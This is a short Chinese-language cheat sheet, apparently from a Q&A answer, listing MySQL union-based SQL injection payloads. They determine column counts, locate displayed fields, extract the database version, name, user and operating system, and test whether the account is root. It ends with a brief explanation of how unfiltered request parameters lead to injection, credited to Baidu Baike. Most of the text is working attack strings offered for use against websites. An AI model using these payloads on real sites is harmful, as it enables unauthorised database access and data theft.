通常from後面都會有壹個表名,比如 admin id user之類的union select 1,2,3,4,5,6,7,8,9,10,11 from。
暴字段長度
Order by num/*
匹配字段
and 1=1 union select 1,2,3,4,5…….n/*
暴字段位置
and 1=2 union select 1,2,3,4,5…..n/*
利用內置函數暴數據庫信息
version() database() user()
不用猜解可用字段暴數據庫信息(有些網站不適用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
操作系統信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
數據庫權限:
and ord(mid(user(),1,1))=114 /* 返回正常說明為root
擴展資料:
網站的配備內容等,壹旦裏面的數據被某人獲得或者是被修改,那麽那個人就可能獲得整個網站的控制權。至於怎麽獲得這些數據,那些MSSQL弱口令的就不說,剩下的最有可能就是利用註入漏洞。
當用戶在網站外部提交壹個參數進入數據庫處理,然後把處理後的結果發給用戶,這個是動態網頁最常見的,但是這個參數壹旦沒有被過濾,使得我們自己構造的sql語句也可以和參數壹起參與數據庫操作的,那麽SQL註入漏洞就會產生。
壹個網站上存在外地數據提交是很正常的,壹般都是用參數接受(request),然後再進行處理,而涉及於數據庫操作的卻占了很大的壹部分。
百度百科-註入